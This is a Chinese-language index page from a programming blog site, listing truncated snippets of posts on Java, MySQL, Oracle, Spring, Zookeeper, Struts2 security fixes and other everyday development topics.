    本文对微博中常见的问题的对应算法进行了简单的介绍,在实际应用中的算法比介绍的要复杂的多。当然,本文覆盖的主题并不全,比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”,希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。 微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作:原创、转发、回复、阅读、关注、@等。其中,前四个是针对短博文,最后的关注和@则针
  • Connection reset 连接被重置的解决方法 百合不是茶 java字符流连接被重置
    流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置   被重置的代码如下;   客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
  • web.xml配置详解之filter bijian1013 javaweb.xmlfilter
    一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
  • Heritrix Bill_chen 多线程xml算法制造配置管理
    作为纯Java语言开发的、功能强大的网络爬虫Heritrix,其功能极其强大,且扩展性良好,深受热爱搜索技术的盆友们的喜爱,但它配置较为复杂,且源码不好理解,最近又使劲看了下,结合自己的学习和理解,跟大家分享Heritrix的点点滴滴。 Heritrix的下载(http://sourceforge.net/projects/archive-crawler/)安装、配置,就不罗嗦了,可以自己找找资
  • 【Zookeeper】FAQ bit1129 zookeeper
    1.脱离IDE,运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient    1. Zookeeper是的Watcher回调是同步操作,需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房,那么Leader/
  • The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
    今天遇到一个客户BUG,当前的jdbc连接用户是root,然后部分删除操作都会报下面这个错误:The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器,而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */  原来最初
  • javascript中showModelDialog刷新父页面 bozch JavaScript刷新父页面showModalDialog
    在页面中使用showModalDialog打开模式子页面窗口的时候,如果想在子页面中操作父页面中的某个节点,可以通过如下的进行:       window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self       在子页面使用w
  • 编程之美-买书折扣 bylijinnan 编程之美
    import java.util.Arrays; public class BookDiscount { /**编程之美 买书折扣 书上的贪心算法的分析很有意思,我看了半天看不懂,结果作者说,贪心算法在这个问题上是不适用的。。 下面用动态规划实现。 哈利波特这本书一共有五卷,每卷都是8欧元,如果读者一次购买不同的两卷可扣除5%的折扣,三卷10%,四卷20%,五卷
  • 关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 strutsWEB安全
    因为近期负责的几个银行系统软件,需要交付客户,因此客户专门请了安全公司对系统进行了安全评测,结果发现了诸如跨站执行脚本,远程执行漏洞以及弱口令等问题。 下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理,服务器的弱口令问题,首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户,默认是不需要密码的,经过分析发现服务器使用了FTP协议, 而使用ftp协议默认会产生一个匿名用
  • [电力与暖气]煤炭燃烧与电力加温 comsci
          在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区.....       不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢?   &nbs
  • oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
    O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
  • 比较全面的MySQL优化参考 dengkane mysql
    本文整理了一些MySQL的通用优化方法,做个简单的总结分享,旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作,至于具体的SQL优化,大部分通过加适当的索引即可达到效果,更复杂的就需要具体分析了,可以参考本站的一些优化案例或者联系我,下方有我的联系方式。这是上篇。   1、硬件层相关优化   1.1、CPU相关   在服务器的BIOS设置中,可
  • C语言homework2,有一个逆序打印数字的小算法 dcj3sjt126com c
    #h1#   0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一: # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
  • apacheBench对网站进行压力测试 dcj3sjt126com apachebench
       ab 的全称是 ApacheBench , 是 Apache 附带的一个小工具 , 专门用于 HTTP Server 的 benchmark testing , 可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试,看起来也不错,很简单,也很容易使用,所以今天花一点时间看了一下。 通过下面的一个简单的例子和注释,相信大家可以更容易理解这个工具的使用。
  • 2种办法让HashMap线程安全 flyfoxs javajdkjni
    多线程之--2种办法让HashMap线程安全 多线程之--synchronized 和reentrantlock的优缺点 多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync)     HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.  
  • Spring Security(04)——认证简介 234390216 Spring Security认证过程
    认证简介 目录 1.1     认证过程 1.2     Web应用的认证过程 1.2.1    ExceptionTranslationFilter 1.2.2    在request之间共享SecurityContext   1
  • Java 位运算 Javahuhui java位运算
    // 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后,低位补0: // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
  • mysql免安装版配置 ldzyz007 mysql
    1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见,如果有那么多RAM内存可以使用,自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
  • MFC和ado数据库使用时遇到的问题 你不认识的休道人 sqlC++mfc
    =================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
  • 表单重复提交Double Submits rensanning double
    可能发生的场景: *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求(Ajax) (1)点击按钮后disable该按钮一会儿,这样能避免急躁的用户频繁点击按钮。 这种方法确实有些粗暴,友好一点的可以把按钮的文字变一下做个提示,比如Bootstrap的做法: http://getbootstrap.co
  • Java String 十大常见问题 tomcat_oracle java正则表达式
     1.字符串比较,使用“==”还是equals()?   "=="判断两个引用的是不是同一个内存地址(同一个物理对象)。   equals()判断两个字符串的值是否相等。   除非你想判断两个string引用是否同一个对象,否则应该总是使用equals()方法。   如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。    
  • SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
    思路,先登陆后,将登陆信息存储在session中,然后通过拦截器,对系统中的页面和资源进行访问拦截,同时对于登陆本身相关的页面和资源不拦截。   实现方法: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他